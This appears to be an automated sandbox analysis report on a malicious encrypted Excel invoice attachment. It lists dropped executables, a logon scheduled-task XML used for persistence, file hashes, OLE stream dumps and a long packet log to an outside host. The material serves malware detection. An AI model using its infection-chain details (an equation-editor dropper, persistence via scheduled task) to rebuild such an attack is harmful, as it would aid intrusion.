Preview:	MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0......*..\+...+..$,...,...,..P-...-......\|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................

C:\Users\user\AppData\Local\Temp\tmp2720.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1621
Entropy (8bit):	5.142576854240234
Encrypted:	false
SSDEEP:	24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBEtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3o
MD5:	4D474995C554718DFBC52E008342BB25
SHA1:	81201E86AE8C1E271015593C11132CE6DC4CC602
SHA-256:	BCAC1EF2C39F4D17E9325D7553E6889AA83A52F5D476A8C22B2823C1D4D2932B
SHA-512:	75B76D90FD968A39BD0A9F21E0F4C6CE004F55C5915BA5BF9A9BA3279C87AA0A8E606EBBD8054CE5E76601773294075A909F4D309D1C27C66AE6575EDC44325F
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
File Type:	ISO-8859 text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:ZQt:ZQt
MD5:	E829F44A04930C7C533538BB54E1B895
SHA1:	5E1258B6E344A4C819910875152DE566B84DDB77
SHA-256:	2D2583CF5175C659B83839F994E77A789E4309420DABBCFD9AD7C1F40BBAEB00
SHA-512:	A712E891465656E7068152ECA2560C4E3C34E46249510F509186AD31DE7F4D2AF8EC3A730F2116E65FF35C8D9183342C25C23A76AB7CE5D8614217E4B3B19D4C
Malicious:	true
Preview:	RP.....H

C:\Users\user\AppData\Roaming\gmSlQSien.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	802304
Entropy (8bit):	7.807064216316379
Encrypted:	false
SSDEEP:	12288:fqPhNb1Cpc0vs3YpRTYmuCBWhfCfyxmbKzYwafnJMKrXe3tw2luRVZzQKaq:iPhxcpHUIpRTY0c1uyUeU3nJMKoCaq
MD5:	A3CBEB3E732B11954572B3EE6755242C
SHA1:	EBB41B49DE8F1B09EA20DABFFCFD85B93B68D7F3
SHA-256:	E006460AD1E34DDBBC28430C2D529A7EE491893C7AE8B6902B2D8D8C56620510
SHA-512:	455C3CAE5F85B8F3334004E09C5EF42BB6E8410F7501AEF0D520E1023EB376E31D6FA892DAB8DC8AAEA94914F31EC7915E8424362F1046F25F9B55C58EF94BD6
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P..2...........P... ...`....@.. ....................................@.................................@P..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............<..............@..B................tP......H........}..du...............]...........................................0............(....(..........(.....o .........................(!......("......(#......($......(%....N..(....o....(&....&..('.....s(........s)........s........s+........s,............0...........~....o-....+...0...........~....o.....+...0...........~....o/....+...0...........~....o0....+...0...........~....o1....+...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....+...0......

C:\Users\user\Desktop\~$SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	802304
Entropy (8bit):	7.807064216316379
Encrypted:	false
SSDEEP:	12288:fqPhNb1Cpc0vs3YpRTYmuCBWhfCfyxmbKzYwafnJMKrXe3tw2luRVZzQKaq:iPhxcpHUIpRTY0c1uyUeU3nJMKoCaq
MD5:	A3CBEB3E732B11954572B3EE6755242C
SHA1:	EBB41B49DE8F1B09EA20DABFFCFD85B93B68D7F3
SHA-256:	E006460AD1E34DDBBC28430C2D529A7EE491893C7AE8B6902B2D8D8C56620510
SHA-512:	455C3CAE5F85B8F3334004E09C5EF42BB6E8410F7501AEF0D520E1023EB376E31D6FA892DAB8DC8AAEA94914F31EC7915E8424362F1046F25F9B55C58EF94BD6
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P..2...........P... ...`....@.. ....................................@.................................@P..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............<..............@..B................tP......H........}..du...............]...........................................0............(....(..........(.....o .........................(!......("......(#......($......(%....N..(....o....(&....&..('.....s(........s)........s........s+........s,............0...........~....o-....+...0...........~....o.....+...0...........~....o/....+...0...........~....o0....+...0...........~....o1....+...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....+...0......

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.996512042903542
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx
File size:	2355200
MD5:	216f2652001700d1f7ac1109a508ce2d
SHA1:	82d3a0b7bb096d03f9f1a4de5444c216849d576b
SHA256:	9b393f90c5fa6aabf671d0f80a9ee0e4f44330cd3ee14dc0d9066f978d9435ff
SHA512:	e854221d2c4992565e49577f3d31753916088fa6c022f23d956e68d1964b15fc95095d35cc7f016e3decf8773fb184b9fb15aa4bdfa9b136b0284c1291a7a6dc
SSDEEP:	49152:RgiTzvPAADDhb9t8qo8hcgu9iMi7SFIMYb9QRm13KFQtwLK:R9vPAAXhZaZX9iv7C1oQQcqwO
File Content Preview:	........................>...................$....................................................................................................................................... ...!..."...#...$...~...............z......................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 2333048

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	2333048
Entropy:	7.9998366813
Base64 Encoded:	True
Data ASCII:	h . # . . . . . . . ? . @ . H . & . . . . 5 . . ) . $ { . . . T = . . . P . \| B . K . . . O x f K . . . % . ? . - . } Z . . . T r S V . . . . > . . . . . . . . . . . J . . ? > . . . . . . . . . . . J . . ? > . . . . . . . . . . . J . . ? > . . . . . . . . . . . J . . ? > . . . . . . . . . . . J . . ? > . . . . . . . . . . . J . . ? > . . . . . . . . . . . J . . ? > . . . . . . . . . . . J . . ? > . . . . . . . . . . . J . . ? > . . . . . . . . . . . J . . ? > . . . . . . . . . . . J . . ? > . . . . . . .
Data Raw:	68 99 23 00 00 00 00 00 ef af 3f 88 40 98 48 be 26 85 06 9f ac 35 e5 f7 29 f9 24 7b e7 8e a0 54 3d ef c0 be 50 d2 7c 42 f7 4b d4 07 f6 4f 78 66 4b b4 f3 f4 25 c2 3f 95 2d 16 7d 5a 88 0b 18 54 72 53 56 13 20 0d 1d da 3e 03 90 e4 19 0b 81 19 e7 a4 c8 aa 4a fb 11 3f 3e 03 90 e4 19 0b 81 19 e7 a4 c8 aa 4a fb 11 3f 3e 03 90 e4 19 0b 81 19 e7 a4 c8 aa 4a fb 11 3f 3e 03 90 e4 19 0b 81 19

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.52599239953
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . 2 . a . . . D . d . . . . A < ~ . . . . . . . . . . . . . ~ . . . . . . . . K . [ . B . 6 . . . < . . . . : . . . . . . . . 6 9 . . . b
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 08:02:43.703808069 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:43.865977049 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:43.866086006 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:43.867336988 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.030188084 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.030231953 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.030258894 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.030287027 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.030385017 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.030462027 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.195743084 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.195807934 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.195846081 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.195899963 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.195945978 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.195990086 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.195991039 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.196031094 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.196053028 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.196073055 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.196085930 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.196120024 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.358494997 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.358552933 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.358603954 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.358632088 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.358642101 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.358683109 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.358721018 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.358727932 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.358745098 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.358753920 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.358760118 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.358779907 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.358800888 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.358839989 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.358848095 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.358855963 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.358891964 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.358916998 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.358932018 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.358948946 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.358973026 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.359003067 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.359013081 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.359050035 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.359052896 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.359066963 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.359092951 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.359131098 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.359133005 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.359153986 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.359189987 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.361517906 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.521454096 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.521497011 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.521533012 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.521569967 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.521605015 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.521632910 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.521653891 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.521672010 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.521681070 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.521697044 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.521711111 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.521727085 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.521747112 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.521756887 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.521785021 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.521787882 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.521822929 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.521833897 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.521863937 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.521867037 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.521907091 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.521918058 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.521943092 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.521946907 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.521979094 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.521991968 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.522015095 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.522020102 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.522051096 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.522052050 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.522087097 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.522100925 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.522123098 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.522130966 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.522156954 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.522167921 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.522207022 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.522217989 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.522243977 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.522245884 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.522279978 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.522290945 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.522315979 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.522327900 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.522351980 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.522356987 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.522384882 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.522387981 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.522423983 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.522435904 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.522465944 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.522468090 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.522506952 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.522516966 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.522542000 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.522543907 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.522577047 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.522593021 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.522612095 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.522624016 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.522663116 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.524878025 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.684993029 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.685267925 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.685551882 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.685591936 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.685620070 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.685643911 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.685645103 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.685667992 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.685684919 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.685697079 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.685729980 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.685746908 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.685760975 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.685784101 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.685797930 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.685808897 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.685825109 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.685841084 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.685859919 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.685879946 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.685895920 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.685897112 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.685916901 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.685925961 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.685934067 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.685946941 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.685957909 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.685966969 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.685988903 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.685988903 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.686018944 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.686028004 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.686045885 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.686058998 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.686088085 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.686119080 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.686964035 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687002897 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687025070 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687047958 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687053919 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.687072992 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687077999 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.687099934 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687110901 CEST	49167	80	192.168.2.22	13.235.115.155
Apr 12, 2021 08:02:44.687129021 CEST	80	49167	13.235.115.155	192.168.2.22
Apr 12, 2021 08:02:44.687139034 CEST	49167	80	192.168.2.22	13.235.115.155
